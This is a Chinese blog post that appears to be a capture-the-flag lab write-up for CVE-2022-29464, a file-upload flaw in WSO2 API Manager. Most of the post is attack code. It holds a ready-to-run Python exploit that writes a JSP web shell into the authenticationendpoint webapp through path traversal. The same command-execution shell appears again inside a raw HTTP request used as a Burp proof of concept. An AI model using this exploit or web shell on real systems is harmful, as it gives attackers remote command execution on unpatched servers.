春秋云镜CVE-2022-29464 （WSO2文件上传漏洞）

Jehol丶fan

于 2023-09-23 11:07:31 发布

阅读量730

点赞数 1

文章标签：安全

本文链接：https://blog.csdn.net/sjsjshhs134654/article/details/133199368

版权

一：访问靶机：

2：根据提示知道可以文件上传

3：两个方法

一：访问靶机：

[Publisher Portal]WSO2 APIMhttp://eci-2ze2c4nntuky5g5s16lc.cloudeci1.ichunqiu.com:9445

2：根据提示知道可以文件上传

3：我们两个方法

1：使用EXP

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("请输入URL：")
file = "shell.jsp"
payload = """<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>"""

files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")

运行效果图

直接访问。拿到flag

2：使用burp抓包修改参数

poc

POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
 
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"
 
<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--